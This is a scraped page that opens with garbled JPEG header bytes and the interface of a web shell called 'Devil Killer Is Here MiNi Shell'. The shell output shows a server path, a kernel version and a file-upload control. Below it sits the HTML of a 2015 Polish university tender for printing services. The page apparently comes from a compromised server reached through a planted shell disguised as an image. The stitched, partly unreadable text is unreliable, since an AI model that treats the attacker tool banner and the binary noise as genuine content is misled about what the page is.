JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150618/147986-N-2015.html

<p class="kh_header"><b>Wrocław: SUKCESYWNE USŁUGI DRUKU DLA ASP WE WROCŁAWIU, znak sprawy ZP-8/06/2015</b><br>
<b>Numer ogłoszenia: 147986 - 2015; data zamieszczenia: 18.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu , pl. Polski 3/4, 50-156 Wrocław, woj. dolnośląskie, tel. 071 3438031 w. 233, faks 071 3431558.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.asp.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNE USŁUGI DRUKU DLA ASP WE WROCŁAWIU, znak sprawy ZP-8/06/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> LP.	-USŁUGA DRUKU NAZWA-(RODZAJ) DRUKU	-PRZEWIDYWANY (PLANOWANY DO DRUKU) NAKŁAD (SZT.)-MINIMALNY ZAMAWIANY NAKŁAD DO DRUKU (SZT.)  tj. 70% przewidywanego nakładu:
1	 AFISZ 	-450	szt.-	315	szt.
2	 ALBUM-	1000	szt.-	700	szt.
3	 ZESZYT RZEŹBIARSKI-	700	szt.-	490	szt.
4	 CZASOPISMO	-1800	szt.-	1260	szt.
5	 FOLDER NR-1	300	szt.-	210	szt.
6	 INFORMATOR NR 1-	500	szt.-	350	szt.
7	 INFORMATOR NR 2	- 500	szt.-	350	szt.
8	 INFORMATOR: ZESZYT KATEDRY-	500	szt.-	350	szt.
9	 INFORMATOR-PRZEWODNIK	-300	szt.-	210	szt.
10	 KALENDARZ	-1000	szt.-	700	szt.
11	 KARTKA ŚWIĄTECZNA -	300	szt.-	210	szt.
12	 KATALOG NR 1- 	300	szt.-	210	szt.
13	 KATALOG NR 2	-500	szt.-	350	szt.
14	 KATALOG NR 3	-400	szt.-	280	szt.
15	 KATALOG NR 4	-400	szt.-	280	szt.
16	 KATALOG NR 5	-400	szt.-	280	szt.
17	 KATALOG NR 6	-400	szt.-	280	szt.
18	 KATALOG NR 7	-500	szt.-	350	szt.
19	 KATALOG NR 8-	300	szt.-	210	szt.
20	 KATALOG NR 9	-300	szt.-	210	szt.
21	 KATALOG NR 10	-300	szt.-	210	szt.
22	 KATALOG NR 11-	300	szt.-	210	szt.
23	 KATALOG NR 12-	300	szt.-	210	szt.
24	 KATALOG NR 13-	1000	szt.-	700	szt.
25	 KATALOG NR 14	-500	szt.-	350	szt.
26	 KATALOG NR 15-	500	szt.-	350	szt.
27	 KATALOG NR 16	-500	szt.-	350	szt.
28	 KATALOG NR 17	-300	szt.-	210	szt.
29	 KATALOG NR 18-	500	szt.-	350	szt.
30	 KATALOG NR 19	-500	szt.-	350	szt.
31	 KATALOG NR 20	-650	szt.-	455	szt.
32	 KATALOG NR 21	-650	szt.-	455	szt.
33	 KATALOG NR 22	-500	szt.-	350	szt.
34	 KATALOG  NR 23-	200	szt.-	140	szt.
35	 KATALOG NR 24-	50	szt.-	35	szt.
36	 KATALOG NR 25	400	szt.-	280	szt.
37	 KATALOG SPECJALNY NR 1	-500	szt.-	350	szt.
38	 KSIĄŻECZKI PROMOCYJNE	-300	szt.-	210	szt.
39	 KSIĄŻKA NR 1	-400	szt.-	280	szt.
40	 KSIĄŻKA NR 2	-800	szt.-	560	szt.
41	 KSIĄŻKA  NR 3-	300	szt.-	210	szt.
42	 KSIĄŻKA NR 4	400	szt.-	280	szt.
43	 KSIĄŻKA NR 5	-500	szt.-	350	szt.
44	 KSIĄŻKA NR 6-	250	szt.-	175	szt.
45	 POCZTÓWKA- 500	szt.-	350	szt.
46	 PLAKAT NR 1	-450	szt.-	315	szt.
47	 PLAKAT NR 2-	50	szt.-	35	szt.
48	 PLAKAT NR 3	-50	szt.-	35	szt.
49	 PLAKAT NR 4	-50	szt.-	35	szt.
50	 PLAKAT NR 5	-50	szt.-	35	szt.
51	 PLAKAT NR 6-	100	szt.-	70	szt.
52	 PLAKAT NR 7	-20	szt.-	14	szt.
53	 PLAKAT NR 8	-38	szt.-	26	szt.
54	 PLAKAT NR 9 	150	szt.-	105	szt.
55	 ROCZNIK KATEDRY SZTUKI MEDIÓW	-300	szt.-	210	szt.
56	 SKRYPT	-200	szt.-	140	szt.
57	 ULOTKA NR 1-500	szt.-	350	szt.
58	 ULOTKA NR 2-	2000	szt.-	1400	szt.
59	 ULOTKA NR 3	-300	szt.-	210	szt.
60	 ULOTKA NR 4-	2000	szt.-	1400	szt.
61	 ULOTKA NR 5	-500	szt.-	350	szt.
62	 ULOTKA NR 6	-1000	szt.-	700	szt.
63	 ULOTKA NR 7	1000	szt.-	700	szt.
64	 ULOTKA NR 8	-300	szt.-	210	szt.
65	 ULOTKA NR 9	-2000	szt.-	1400	szt.
66	 ULOTKA NR 10	-1000	szt.-	700	szt.
67	 ULOTKA NR 11-	500	szt.-	350	szt.
68	 ULOTKA NR 12	-500	szt.-	350	szt.
69	 ULOTKA NR 13-	300	szt.-	210	szt.
70	 ULOTKA NR 14-	500	szt.-	350	szt.
71	 WIDOKÓWKA NR 1	-1000	szt.-	700	szt.
72	 WIDOKÓWKA NR 2	-1000	szt.-	700	szt.
73	 WIZYTÓWKA NR 1	-500	szt.-	350	szt.
74	 WIZYTÓWKA NR 2	-1000	szt.-	700	szt.
75	 WIZYTÓWKA NR 3	-1500	szt.-	1050	szt.
76	 WIZYTÓWKA NR 4-	1500	szt.-	1050	szt.
77	 WIZYTÓWKA NR 5	-5000	szt.-	3500	szt.
78	 WKŁADKI DO ZAPROSZEŃ (INAUGURACJA)	-500	szt.-	350	szt.
79	 WYDAWNICTWO PO SYMPOZJUM HORYZONT  RZEŹBY	-500	szt.-	350	szt.
80	 ZAPROSZENIE NR 1+KOPERTA	-400	szt.-	280	szt.
81	 ZAPROSZENIE NR 2+KOPERTA	-500	szt.-	350	szt.
82	 ZAPROSZENIE NR 3	-200	szt.-	140	szt.
83	 FOLDER NR 2	-300	szt.-	210	szt.
84	 KATALOG NR 26-	500	szt.-	350	szt.
85	 KATALOG SPECJALNY NR 2	-500	szt.-	350	szt.
86	 KSIĄŻKA 	800	szt.-	560	szt.
87	 PLAKAT-	25	szt.-	17	szt.
88	 PLAKAT-	100	szt.-	70	szt.
89	 WIZYTÓWKA	-500	szt.-	350	szt.
90	 ZAPROSZENIE NR 3+KOPERTA	-100	szt.-	70	szt.
91	 KARTKI	-300	szt.-	210	szt.
92	 KATALOG NR 27-	300	szt.-	210	szt.
93	 KATALOG NR 28	-300	szt.-	210	szt.
94	 KATALOG NR 29	-300	szt.-	210	szt.
95	 KATALOG NR 30	-600	szt.-	420	szt.
96	 KATALOG NR 31	-600	szt.-	420	szt.
97	 KATALOG NR 32	-600	szt.-	420	szt.
98	 KATALOG NR 33-	650	szt.-	455	szt.
99	 KATALOG NR 34	-450	szt.-	315	szt.
100	 KATALOG NR 35	-450	szt.-	315	szt.
101	 KATALOG NR 36	-450	szt.-	315	szt.
102	 KATALOG NR 37-	450	szt.-	315	szt.
103 	KATALOG NR 38	-450	szt.-	315	szt.
104	 KATALOG NR 39-	450	szt.-	315	szt.
105	 KATALOG NR 40-	450	szt.-	315	szt.
106	 KATALOG NR 41-	450	szt.-	315	szt.
107	 KATALOG NR 42-	450	szt.-	315	szt.
108	 KATALOG NR 43-	450	szt.-	315	szt.
109	 KATALOG NR 44	-450	szt.-	315	szt.
110	 KATALOG NR 45-	450	szt.-	315	szt.
111	 KATALOG NR 46	-450	szt.-	315	szt.
112	 KATALOG NR 47	-450	szt.-	315	szt.
113	 KATALOG NR 48	-450	szt.-	315	szt.
114	 KATALOG NR 49-	450	szt.-	315	szt.
115	 KATALOG NR 50-	450	szt.-	315	szt.
116	 KATALOG NR 51-	450	szt.-	315	szt.
117	 KATALOG NR 52	-450	szt.-	315	szt.
118	 KATALOG NR 53-	450	szt.-	315	szt.
119	 KATALOG NR 54-	450	szt.-	315	szt.
120	 KATALOG NR 55	-450	szt.-	315	szt.
121	 KATALOG NR 56	-450	szt.-	315	szt.
122	 KATALOG NR 57-	450	szt.-	315	szt.
123	 KATALOG NR 58-	450	szt.-	315	szt.
124	 KATALOG NR 59-	450	szt.-	315	szt.
125	 KATALOG NR 60	-400	szt.-	280	szt.
126	 KATALOG NR 61	-400	szt.-	280	szt.
127	 KATALOG NR 62-	400	szt.-	280	szt.
128	 PLAKAT nr 12-	400	szt.-	280	szt.
129	 PLAKAT nr 13-	400	szt.-	280	szt.
130	 PLAKAT nr 14-400	szt.-	280	szt.
131	 KATALOG NR 63-	400	szt.-	280	szt.
132	 ULOTKA nr 15	-400	szt.-	280	szt.
133	 ULOTKA nr 16	-400	szt.-	280	szt.
134	 ULOTKA nr 17	-400	szt.-	280	szt.
135	 ULOTKA nr 18	-400	szt.-	280	szt.
136	 ZAPROSZENIE nr 4	-400	szt.-	280	szt.
137	 ZAPROSZENIE nr 5	-400	szt.-	280	szt.
138	 ULOTKA nr 19-	400	szt.-	280	szt.
139	ZAPROSZENIE nr 6	-400	szt.-	280	szt.
140	 ZAPROSZENIE nr 7	-400	szt.-	280	szt.
141	 ULOTKA nr 20	-400	szt.-	280	szt.
142	 ULOTKA nr 21	-400	szt.-	280	szt.
143	 ULOTKA nr 22	-400	szt.-	280	szt.
144	ZAPROSZENIE nr 8	-400	szt.-	280	szt.
145	 ZAPROSZENIE nr 9	-400	szt.-	280	szt.
146	 ZAPROSZENIE nr 10	-500	szt.-	350	szt.
147	 ZAPROSZENIE nr 11-	500	szt.-	350	szt.
148	 ZAPROSZENIE nr 12	-500	szt.-	350	szt.
149	ZAPROSZENIE nr 13-	500	szt.-	350	szt.
150	 ZAPROSZENIE nr 14	-500	szt.-	350	szt.
151	 ZAPROSZENIE nr 15	-500	szt.-	350	szt.
152	 ZAPROSZENIE nr 16	-500	szt.-	350	szt.
153	 ZAPROSZENIE nr 17	-500	szt.-	350	szt.
154	MONOGRAFIA	1000	szt.-	700	szt.
155	 KATALOG NR 64	-300	szt.-	210	szt.
156	 ULOTKA nr 23	-300	szt.-	210	szt.
157	 ULOTKA nr 24	-300	szt.-	210	szt.
158	 ULOTKA nr 25	-300	szt.-	210	szt.
159	 ULOTKA nr 26	-300	szt.-	210	szt.
160	 ULOTKA nr 27	-300	szt.-	210	szt.
161	ULOTKA nr 28	-300	szt.-	210	szt.
162	 ULOTKA nr 29	-300	szt.-	210	szt.
163	 ULOTKA nr 30	-300	szt.-	210	szt.
164	ULOTKA nr 31-	300	szt.-	210	szt.
165	 ULOTKA nr 32	-300	szt.-	210	szt.
166	 ULOTKA nr 33	-300	szt.-	210	szt.
167	 ULOTKA nr 34-	300	szt.-	210	szt.
168	 ULOTKA nr 35	-300	szt.-	210	szt.
169	 PLAKAT nr 15-	300	szt.-	210	szt.
170	 PLAKAT nr 16	-300	szt.-	210	szt.
171	 PLAKAT nr 17	-300	szt.-	210	szt.
172	 KATALOG NR 65	-450	szt.-	315	szt.
173	 KATALOG NR 66-	450	szt.-	315	szt.
174	 KATALOG NR 67	-450	szt.-	315	szt.
175	 KATALOG NR 68	-450	szt.-	315	szt.
176	 KATALOG NR 69-	450	szt.-	315	szt.
177	 KATALOG NR 70-450	szt.-	315	szt.
178	 KATALOG NR 71	-450	szt.-	315	szt.
179	 KATALOG NR 72-	450	szt.-	315	szt.
180	 KATALOG NR 73	-450	szt.-	315	szt.
181	 KATALOG NR 74	-450	szt.-	315	szt.
182	 KATALOG NR 75	-450	szt.-	315	szt.
183	 KATALOG NR 76	450	szt.-	315	szt.
184	 KATALOG NR 77	450	szt.-	315	szt.
185	 KATALOG NR 78	-500	szt.-	350	szt.
186	 KATALOG NR 79	-1000	szt.-	700	szt.
187 	KATALOG NR 80	-600	szt.-	420	szt.
188	KATALOG NR 81	-600	szt.-	420	szt.
189	KATALOG NR 82-	600	szt.-	420	szt.
190	KATALOG NR 83	-3000	szt.-	2100	szt.
191	KATALOG NR 84	-2200	szt.-	1540	szt.
Przedmiotem zamówienia są usługi druku dla Akademii Sztuk Pięknych im. Eugeniusz Gepperta we Wrocławiu, wykonywane zgodnie z projektami przedstawionym przez Zamawiającego, wraz z dostawą do siedziby ASP i wniesieniem wykonanych zamówień do wskazanych pomieszczeń.

Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 2 do SIWZ.
Formularz asortymentowo-cenowy (szczegółowy opis przedmiotu zamówienia) tj. załącznik nr 2 do SIWZ stanowi treść oferty i nie podlega uzupełnianiu na podstawie art. 26 ust.3 ustawy Pzp.

Usługi druku objęte niniejszym postępowaniem realizowane będą przez Wykonawcę na podstawie składnych sukcesywnie zapotrzebowań (zleceń) według potrzeb Zamawiającego i wykonywane przez Wykonawcę zgodnie z projektem przedstawionym przez Zamawiającego. 
W ramach jednej pozycji formularza asortymentowo-cenowego dopuszcza się wykonanie usługi druku wizytówek na podstawie różnych projektów. Oznacza to, że w przypadku konieczności wykonania druku wizytówek wskazanych w konkretnej pozycji załącznika nr 2 Zamawiający będzie miał możliwość złożyć Wykonawcy projekt z danymi różnych osób.
Szacowany nakład (całkowita liczba jednorazowo wydrukowanych egzemplarzy) zamawianych usług druku określony w załączniku nr 2 do SIWZ jest wielkością orientacyjną, przewidywaną do wydrukowania przez Zamawiającego w okresie wykonania zamówienia. Zamawiający zastrzega sobie prawo do zmiany zamówienia w ramach załącznika nr 2 do SIWZ zarówno w zakresie asortymentowym lub ilościowym.

Zamawiający dopuszcza zwiększenie nakładu w obrębie poszczególnych pozycji. 
Zamawiający określa nakład minimalny i zobowiązuje się w przypadku konieczności zmniejszenia nakładu zamawianego do zrealizowania nakładu zamawianego na poziomie 70% w obrębie poszczególnych pozycji.

Podane w opisie przedmiotu zamówienia wymiary formatów mogą ulec zmianie w granicach 
+- 1 cm. 

W przypadku, gdy Zamawiający w formularzu szczegółowy opis przedmiotu zamówienia nie skonkretyzował wymaganych parametrów dotyczących wykonania proof-ów, należy przyjąć, że mają być wykonane 3 szt. proof-ów (dotyczy to wyłącznie pozycji złącznika nr 2,w której istnieje zapis w brzmieniu: PROOFY-TAK).

W przypadku, gdy Zamawiający w formularzu szczegółowy opis przedmiotu zamówienia nie skonkretyzował wymaganych parametrów dotyczących wykonania okładki ze skrzydełkami, należy przyjąć 10cm (dotyczy to wyłącznie pozycji złącznika nr 2,w której istnieje zapis w brzmieniu: okładka ze skrzydełkami - bez podanego wymiaru).

Wykonawca zobowiązany jest zrealizować przedmiot zamówienia i dostarczać do siedziby Zamawiającego na własny koszt i ryzyko.

Zamawiający zobowiązuje się do przekazania Wykonawcy materiałów w wersji gotowej do druku w formie elektronicznej przed terminem wykonania usługi.

Szczegółowe warunki i zasady realizacji umowy określa projekt umowy (załączniki nr 8 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium. 

2.	Zamawiający ustala kwotę wadium na:	5.000 zł (pięć tysięcy złotych 00/100).

3.	Wadium może być wnoszone w następujących formach: 
1.	w pieniądzu, 
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.	gwarancjach bankowych, 
4.	gwarancjach ubezpieczeniowych,
5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.  z 2007 Nr 42 poz. 275 z późn. zm.).

4.	Wadium Wykonawca musi wnieść przed upływem terminu składania ofert tj. do 30-06-2015r. do godz. 10:00, na cały okres ważności oferty i nie może zawierać żadnych ograniczeń sprzecznych z ustawą, w szczególności ograniczających możliwość zrealizowania praw określonych w art. 46 ust. 4a i ust. 5 ustawy Pzp.

5.	Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego: 
ING Bank Śląski S.A. o/Wrocław nr 93 1050 1575 1000 0005 0269 6594,
z podaniem nazwy przetargu - wadium na przetarg ZP-8/06/2015. 		

6.	Wniesienie wadium w pieniądzu, w formie przelewu bankowego, Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert  tj. do 30-06-2015r. do godz. 10:00.

7.	Wadium wnoszone w innej formie niż pieniądz winno być wystawione na Zamawiającego, mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego na pierwsze pisemne żądanie Zamawiającego. 

8.	Oryginał dokumentu wadialnego ma być zdeponowany w Kasie ASP we Wrocławiu. Wadium można składać od poniedziałku do piątku w godz. 12:00-14:00, a w dniu otwarcia ofert od godz. 8:30, (pok. 111, Ip).

9.	Zaleca się, aby do oferty Wykonawca załączył kserokopię wpłaty wadium (w przypadku wniesienia wadium w formie pieniężnej), w pozostałych przypadkach kopię dokumentu wadialnego.
10.	Zamawiający zwraca wadium zgodnie z art. 46 ust. 1, 1a, 2, 4 ustawy Pzp. 
11.	Zamawiający zatrzymuje wadium zgodnie z art. 46 ust. 4a, 5.
12.	Zamawiający żąda ponownego wniesienia wadium zgodnie z art. 46 ust. 3.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień. 
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 4 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 4 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 4 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 4 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 4 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
